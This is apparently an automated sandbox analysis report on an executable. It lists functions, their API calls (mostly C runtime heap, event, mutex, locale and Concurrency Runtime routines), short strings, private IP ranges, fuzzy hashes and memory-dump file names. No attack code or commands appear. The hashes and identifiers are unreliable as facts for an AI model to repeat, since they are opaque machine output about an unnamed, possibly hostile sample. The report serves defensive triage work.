API ID: Name::operator=Replicator::operator[]
String ID: )]E$)]E$@$generic-type-$template-parameter-$~`|+$~E
API String ID: 3211817929-677372708
Opcode ID: c833d789047895d616b13b90a478aa8422b4b788839a87e18d8b5ffc0f682ac5
Instruction ID: 85c4e7eba437053b2223b2d42322b422f742dab37c5dc9eb7ee8512bc45d8b86
Opcode Fuzzy Hash: c833d789047895d616b13b90a478aa8422b4b788839a87e18d8b5ffc0f682ac5
Instruction Fuzzy Hash: CA5186B1D002099BDB05DF55D846AFEB7F8AB18306F14402FE905B7292DF785A0ACF99

Uniqueness

Uniqueness Score: -1.00%

Function 004AC200, Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004AC212

Part of subcall function 004AC004: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004AC027

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004AC233
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004AC240
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004AC28E
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004AC315
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004AC328
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 004AC375

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: ada288389c37a76f39f3b029cc956fc8f1ce6130133e31b76941b5585871630f
Instruction ID: d87f58620c9648f233df4b733b416d7940f558d21a60d55018226a65924c23fc
Opcode Fuzzy Hash: ada288389c37a76f39f3b029cc956fc8f1ce6130133e31b76941b5585871630f
Instruction Fuzzy Hash: A1819E71800249ABDF56DF94C991BBF7B71AF2B308F04409AEC416B352C73A8D15DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0049C73E, Relevance: 21.2, APIs: 14, Instructions: 197timeregistryCOMMON

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0049C798

Part of subcall function 0049C579: InitializeSListHead.KERNEL32(?,00000000,?,00497403), ref: 0049C645
Part of subcall function 0049C579: InitializeSListHead.KERNEL32(?), ref: 0049C64F

ListArray.LIBCONCRT ref: 0049C7CC
Hash.LIBCMT ref: 0049C835
Hash.LIBCMT ref: 0049C845
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0049C8DA
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0049C8E7
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0049C8F4
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 0049C901

Part of subcall function 004A3400: std::bad_exception::bad_exception.LIBCMT ref: 004A3422

RegisterWaitForSingleObject.KERNEL32 ref: 0049C989
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0049C9AB
GetLastError.KERNEL32(?,?,00000000,?,00497403), ref: 0049C9BD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0049C9DA

Part of subcall function 00497C36: CreateTimerQueueTimer.KERNEL32(?,00497403,?,00000000,?,?,00000000,?,0049C9DF,?,00000000,0049FDC0,?,7FFFFFFF,7FFFFFFF,00000000), ref: 00497C4E

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0049CA04

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 24295782aa1229cbf83e85f2d613dd90d69aae47173891e6f3c1cefc93011f8e
Instruction ID: dc821d0b74e51530be1e9b2aff134a1b9be310ae3709bbafd9a5e034a3a6c043
Opcode Fuzzy Hash: 24295782aa1229cbf83e85f2d613dd90d69aae47173891e6f3c1cefc93011f8e
Instruction Fuzzy Hash: AA8150B0A10A52BBDB04DF798845BD9FEA8BF09704F10422FF529D3281DB786514CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 004422D0, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000,2B7C607E,004FC4C0,00000000), ref: 00442377
CloseHandle.KERNEL32(00000000), ref: 0044238C
ResetEvent.KERNEL32(00000000,?,?), ref: 0044239A
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004423ED
CloseHandle.KERNEL32(00000000), ref: 00442402
CloseHandle.KERNEL32(00000000,2B7C607E,?,?), ref: 00442428
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2B7C607E,?,?), ref: 0044248C
CloseHandle.KERNEL32(00000000,?,?), ref: 004424A1

Strings

~`|+, xrefs: 004422F2, 0044242E
~`|+, xrefs: 00441C58, 004422E4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventHandle$Create$OpenReset
String ID: ~`|+$~`|+
API String ID: 3337962467-2422257929
Opcode ID: 2c29a7ec311ae01c2b210b50ec9be5278d18ee30ad9013756d47472d8d3f7daa
Instruction ID: 89d712c4799e00e77475d6eb16c12835b2c02775d93fe7a397ac4ff2aa4e904c
Opcode Fuzzy Hash: 2c29a7ec311ae01c2b210b50ec9be5278d18ee30ad9013756d47472d8d3f7daa
Instruction Fuzzy Hash: 7F516471D043189BEF21CFA48E487AEB7B8EB05714F54022AF909EB391D7789D05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049AA79, Relevance: 19.7, APIs: 13, Instructions: 223COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 0049AA88

Part of subcall function 0049BD8C: GetVersionExW.KERNEL32(?), ref: 0049BDB0
Part of subcall function 0049BD8C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 0049BE4F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0049AA9C
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 0049AABD
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0049AB26
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0049AB5A

Part of subcall function 004989E9: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00498A09

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 0049ABDA

Part of subcall function 0049A5A3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 0049A5B7

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0049AC22

Part of subcall function 004989BE: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004989DA

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0049AC36
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0049AC47
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 0049AC94
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0049ACB9
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0049ACC5

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 051d74f7b945278fe62abee2f4e410e09a919598ce546133d5c529113efcf27e
Instruction ID: ad6d058844a621c587b6a5e9bc98f14ff5b4354550b3d6065fe7b1672acc22a6
Opcode Fuzzy Hash: 051d74f7b945278fe62abee2f4e410e09a919598ce546133d5c529113efcf27e
Instruction Fuzzy Hash: 6081AE71A0021A8FCF18DFA9DAD157EBFA1BB44344B15803EE841A7341DB386960CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9A0, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 345COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(::1,00000003,fc00::,00000006,fe80::,00000006,0.0.0.0,00000007,169.254.0.0,0000000B,192.168.0.0,0000000B,127.0.0.1,00000009,172.16.0.0,0000000A), ref: 0041FFD0

Strings

0.0.0.0, xrefs: 0041FBF7
::1, xrefs: 0041FCFC
169.254.0.0, xrefs: 0041FBB0
172.16.0.0, xrefs: 0041FA60
fc00::, xrefs: 0041FCA3
192.168.0.0, xrefs: 0041FB42
127.0.0.1, xrefs: 0041FAD1
fe80::, xrefs: 0041FC4D
~`|+, xrefs: 0041F9B7
10.0.0.0, xrefs: 0041FA03

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess
String ID: 0.0.0.0$10.0.0.0$127.0.0.1$169.254.0.0$172.16.0.0$192.168.0.0$::1$fc00::$fe80::$~`|+
API String ID: 2050909247-1774582854
Opcode ID: 54b1b957dcca39c8f6249f7c347b8fc594e0a3a9927fbb614882ced6b6c9d2e0
Instruction ID: 5f1e96fe1685e437c25dbbc0ddd305c5cd67a5cb07fcbb9dc2bc997c8f9b18b7
Opcode Fuzzy Hash: 54b1b957dcca39c8f6249f7c347b8fc594e0a3a9927fbb614882ced6b6c9d2e0
Instruction Fuzzy Hash: 4CF1B370D052988AEB25CF64CE447EDBB71BB56308F14829ED0487B2D2DBB91AC8CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00447310, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000,2B7C607E), ref: 004473B0
CloseHandle.KERNEL32(00000000), ref: 004473C5
ResetEvent.KERNEL32(00000000,2B7C607E), ref: 004473D3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00447426
CloseHandle.KERNEL32(00000000), ref: 0044743B
SetEvent.KERNEL32(00000000), ref: 0044744E
CloseHandle.KERNEL32(00000000,2B7C607E), ref: 00447461
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2B7C607E), ref: 004474BB
CloseHandle.KERNEL32(00000000), ref: 004474D0
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,2B7C607E), ref: 004474E6

Strings

~`|+, xrefs: 00447324

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseHandle$Create$ObjectOpenResetSingleWait
String ID: ~`|+
API String ID: 3951656645-3443854377
Opcode ID: 253c6867221ef56d8b1ca8efc6f92dd7682993cd88910be53688ce2c4e8a0ef2
Instruction ID: b855efa40c26aa336364638b6e8f7ac3e828a4ea7e4a995bae90012166e9b34c
Opcode Fuzzy Hash: 253c6867221ef56d8b1ca8efc6f92dd7682993cd88910be53688ce2c4e8a0ef2
Instruction Fuzzy Hash: 52516071D08318AFEF11CFA4CC48BAEBBB9AF05724F10451AE919AB380D7789C06CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004437E0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000,2B7C607E,004FC4C8,00000000), ref: 00443887
CloseHandle.KERNEL32(00000000), ref: 0044389C
ResetEvent.KERNEL32(00000000), ref: 004438AA
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004438FD
CloseHandle.KERNEL32(00000000), ref: 00443912
CloseHandle.KERNEL32(00000000,2B7C607E,?,?), ref: 00443938
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2B7C607E,?,?), ref: 0044399C
CloseHandle.KERNEL32(00000000), ref: 004439B1

Strings

~`|+, xrefs: 0044292B, 004437F4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventHandle$Create$OpenReset
String ID: ~`|+
API String ID: 3337962467-3443854377
Opcode ID: 0bcb11b8c0d53f96f1170dbc225864773b229b8f2f7ccd2963b1b74172302ea8
Instruction ID: 7f6e1cda4421f173ffed8ecdd85d94c89273ee09cef6166604437fbbfb85eb94
Opcode Fuzzy Hash: 0bcb11b8c0d53f96f1170dbc225864773b229b8f2f7ccd2963b1b74172302ea8
Instruction Fuzzy Hash: 21518471D043189FEF21DFA48D48BAEB7F4AF05B12F14022AE508AB391D7789E05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043F4A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 136synchronizationfileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00439AFF,?,?,00000000), ref: 0043F4FF
CloseHandle.KERNEL32(00000007,?,?,?,?,?,?,?,?,?,?,?,00439AFF,?,?,00000000), ref: 0043F513
OpenMutexW.KERNEL32(00100000,00000000,004F5390,?,?,?,?,?,?,?,?,?,?), ref: 0043F5B1
CreateMutexW.KERNEL32(?,00000000,004F5378,?,?,?,?,?,?,?,?,?,?), ref: 0043F5DE
CreateMutexW.KERNEL32(?,00000000,004F5360,?,?,?,?,?,?,?,?,?,?), ref: 0043F60D
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000004,00000000,00000000,?,?), ref: 0043F635

Strings

xSO, xrefs: 0043F5CA
`SO, xrefs: 0043F5F9
l:I, xrefs: 0043F56C
Q:I, xrefs: 0043F55B
~`|+, xrefs: 0043F4A3

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMutex$CloseHandle$FileOpen
String ID: Q:I$`SO$l:I$xSO$~`|+
API String ID: 3708376526-1004320529
Opcode ID: 043809433e1b4a707545422c92571d3022d3f723062a2680377f1be7f248bded
Instruction ID: 6e6455e7db27401a2b9c1d0339ddc90c8ea19c1470d9ce5357b270e77c304b66
Opcode Fuzzy Hash: 043809433e1b4a707545422c92571d3022d3f723062a2680377f1be7f248bded
Instruction Fuzzy Hash: 5B51CE70A00701EFD720DF28D989B2BB7E4FB48715F504A2EFA5587290D778E859CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00460A41, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460A57

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

_free.LIBCMT ref: 00460A63
_free.LIBCMT ref: 00460A6E
_free.LIBCMT ref: 00460A79
_free.LIBCMT ref: 00460A84
_free.LIBCMT ref: 00460A8F
_free.LIBCMT ref: 00460A9A
_free.LIBCMT ref: 00460AA5
_free.LIBCMT ref: 00460AB0
_free.LIBCMT ref: 00460ABE

Strings

`L, xrefs: 00460A4E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: `L
API String ID: 776569668-2102550980
Opcode ID: d2dadb113957b4132993de7cd88abb91a502b4b81082b7461be0bd0cfb379037
Instruction ID: ea04a8f919d7bec7e79cad6592ef5a9e2d0cd31e1ea8c034b4fea4e1f2e4f057
Opcode Fuzzy Hash: d2dadb113957b4132993de7cd88abb91a502b4b81082b7461be0bd0cfb379037
Instruction Fuzzy Hash: 8C2198B6900208AFCF41EFD9C851DDE7BB9EF08344F0185AAF5159B221EB35EA45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004674A0, Relevance: 18.4, APIs: 12, Instructions: 374COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004674E8
_free.LIBCMT ref: 0046750C
_free.LIBCMT ref: 00467519
_free.LIBCMT ref: 0046753E
_free.LIBCMT ref: 0046754B
_free.LIBCMT ref: 00467554
_free.LIBCMT ref: 0046782F
_free.LIBCMT ref: 00467837

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fa0205b94c7f9735ef935e2de8d0746f79351a96c3df6e4693c076a112d5baa4
Instruction ID: b238dc393592221606f14f5aa0ed21c7af0f51c4b081e25ca58b0d8d573cd1d6
Opcode Fuzzy Hash: fa0205b94c7f9735ef935e2de8d0746f79351a96c3df6e4693c076a112d5baa4
Instruction Fuzzy Hash: 8FC17771D40204AFDB20DBA8CC42FEFB7F9AF49715F144166FA04EB282E674AD408765

Uniqueness

Uniqueness Score: -1.00%

Function 0045F5CD, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

_memcmp.LIBVCRUNTIME ref: 0045F866
_free.LIBCMT ref: 0045F8DA
_free.LIBCMT ref: 0045F8F3
_free.LIBCMT ref: 0045F931
_free.LIBCMT ref: 0045F93A
_free.LIBCMT ref: 0045F946

Strings

QE, xrefs: 0045F5E6
xBO, xrefs: 0045F914
C, xrefs: 0045F729
~`|+, xrefs: 0045F5D8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_memcmp
String ID: C$QE$xBO$~`|+
API String ID: 4275183328-1709028432
Opcode ID: f0d4f0d12a38c51926a8198ddf5c6cd2c66ebc724aa60a88bef997e03294ede0
Instruction ID: 7e4c22ec5558974e76e9f036c601e0d6519852e94b84dd0e43934a1ed6c619ba
Opcode Fuzzy Hash: f0d4f0d12a38c51926a8198ddf5c6cd2c66ebc724aa60a88bef997e03294ede0
Instruction Fuzzy Hash: BDB15975A012199FDB24DF18C884BAEB7B4FF08305F1085AEE849A7351E734AE98CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00428260, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004282B3
std::_Lockit::_Lockit.LIBCPMT ref: 004282D5
std::_Lockit::~_Lockit.LIBCPMT ref: 004282F5
__Getcvt.LIBCPMT ref: 004283B2
__Getcvt.LIBCPMT ref: 004283FC

Part of subcall function 00428F80: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00428FA6
Part of subcall function 00428F80: std::_Lockit::~_Lockit.LIBCPMT ref: 0042903A

std::_Facet_Register.LIBCPMT ref: 004284CB
std::_Lockit::~_Lockit.LIBCPMT ref: 004284EF

Strings

true, xrefs: 00428439
false, xrefs: 00428423
~`|+, xrefs: 0042828B

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$GetcvtLockit::_$Facet_Locinfo::_Locinfo_dtorRegister
String ID: false$true$~`|+
API String ID: 2460365190-2071882360
Opcode ID: 5fac26ed3eb82a2032e44182f61b0ab6421c4db6832a6df4b35921d0217cc100
Instruction ID: aab0a5494396ee892e2a8a8d622fd2d569fdf0f02568062511de8a421b5bbfca
Opcode Fuzzy Hash: 5fac26ed3eb82a2032e44182f61b0ab6421c4db6832a6df4b35921d0217cc100
Instruction Fuzzy Hash: B691D171E013589BDB10DFA4D941BEEB7F4FF08714F10826EE805A7241EB78AA44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00440010, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0044004F
std::_Lockit::_Lockit.LIBCPMT ref: 00440071
std::_Lockit::~_Lockit.LIBCPMT ref: 00440091
__Getcvt.LIBCPMT ref: 0044014B
__Getcvt.LIBCPMT ref: 00440173
std::_Facet_Register.LIBCPMT ref: 004401D1
std::_Lockit::~_Lockit.LIBCPMT ref: 004401F5

Strings

true, xrefs: 004401A4
false, xrefs: 00440191
~`|+, xrefs: 00440027

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
